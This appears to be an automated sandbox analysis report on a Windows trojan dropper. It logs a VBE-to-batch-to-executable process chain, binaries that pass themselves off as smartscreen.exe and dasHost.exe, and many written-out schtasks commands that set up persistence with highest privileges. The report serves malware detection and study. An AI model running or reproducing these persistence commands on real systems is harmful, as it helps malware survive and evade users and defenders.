Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CE2A0	0_2_008CE2A0
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E02F6	0_2_008E02F6
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D6646	0_2_008D6646
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D37C1	0_2_008D37C1
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008C27E8	0_2_008C27E8
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E070E	0_2_008E070E
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E473A	0_2_008E473A
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CE8A0	0_2_008CE8A0
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CF968	0_2_008CF968
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E4969	0_2_008E4969
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D3A3C	0_2_008D3A3C
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D6A7B	0_2_008D6A7B
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E0B43	0_2_008E0B43
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008ECB60	0_2_008ECB60
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D5C77	0_2_008D5C77
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008DFDFA	0_2_008DFDFA
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CED14	0_2_008CED14
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008D3D6D	0_2_008D3D6D
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CBE13	0_2_008CBE13
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008CDE6C	0_2_008CDE6C
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008C5F3C	0_2_008C5F3C
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: 0_2_008E0F78	0_2_008E0F78
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Code function: 5_2_00007FF848F1C61D	5_2_00007FF848F1C61D
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Code function: 18_2_00007FF848F3C677	18_2_00007FF848F3C677
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Code function: 24_2_00007FF848F4C678	24_2_00007FF848F4C678

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: String function: 008DE360 appears 52 times
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: String function: 008DED00 appears 31 times
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Code function: String function: 008DE28C appears 35 times

Source: Runtimemonitor.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: smartscreen.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dasHost.exe.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: QoRXFaE8Xn.exe, 00000000.00000003.2007809797.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QoRXFaE8Xn.exe
Source: QoRXFaE8Xn.exe, 00000000.00000003.2007467983.0000000004F0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QoRXFaE8Xn.exe
Source: QoRXFaE8Xn.exe, 00000000.00000003.2006583607.00000000065C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QoRXFaE8Xn.exe
Source: QoRXFaE8Xn.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs QoRXFaE8Xn.exe

Source: QoRXFaE8Xn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, mAKywZp8ToODWUb1CfN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, mAKywZp8ToODWUb1CfN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, OD1qKM3n39rG0G3BCS2.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, OD1qKM3n39rG0G3BCS2.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, mAKywZp8ToODWUb1CfN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, mAKywZp8ToODWUb1CfN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, OD1qKM3n39rG0G3BCS2.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, OD1qKM3n39rG0G3BCS2.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, bJEqW1EMsKaCMra046r.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QoRXFaE8Xn.exe.661054d.0.raw.unpack, bJEqW1EMsKaCMra046r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, bJEqW1EMsKaCMra046r.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.QoRXFaE8Xn.exe.4f5854d.1.raw.unpack, bJEqW1EMsKaCMra046r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/15@1/1

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008C6EC9 GetLastError,FormatMessageW,

0_2_008C6EC9

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Code function: 0_2_008D9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_008D9E1C

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

File created: C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe

Jump to behavior

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtimemonitor.exe.log

Jump to behavior

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\1169e0d15058b60dce89554700ae939751a2f0c7

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" "

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Command line argument: sfxname	0_2_008DD5D4
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Command line argument: sfxstime	0_2_008DD5D4
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Command line argument: STARTDLG	0_2_008DD5D4

Source: QoRXFaE8Xn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QoRXFaE8Xn.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QoRXFaE8Xn.exe

ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe

File read: C:\Users\user\Desktop\QoRXFaE8Xn.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QoRXFaE8Xn.exe "C:\Users\user\Desktop\QoRXFaE8Xn.exe"
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortcomAgentwinbroker\Runtimemonitor.exe "C:\PortcomAgentwinbroker\Runtimemonitor.exe"
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeq" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ihpxTeRPVLYTpFZNVeqi" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dasHost.exe'" /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 9 /tr "'C:\Recovery\dasHost.exe'" /rl HIGHEST /f
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe "C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe"
Source: unknown	Process created: C:\Recovery\dasHost.exe C:\Recovery\dasHost.exe
Source: unknown	Process created: C:\Recovery\dasHost.exe C:\Recovery\dasHost.exe
Source: unknown	Process created: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows NT\TableTextService\ihpxTeRPVLYTpFZNVeq.exe "C:\Program Files (x86)\windows nt\TableTextService\ihpxTeRPVLYTpFZNVeq.exe"
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\smartscreen.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\smartscreen.exe"
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortcomAgentwinbroker\w1FXjdRze6k4uvStmhH3M.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortcomAgentwinbroker\1uTBfrpLb993XlgcpIpPee79uOtZ.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortcomAgentwinbroker\Runtimemonitor.exe "C:\PortcomAgentwinbroker\Runtimemonitor.exe"	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Process created: C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe "C:\Windows\appcompat\encapsulation\ihpxTeRPVLYTpFZNVeq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QoRXFaE8Xn.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\PortcomAgentwinbroker\Runtimemonitor.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
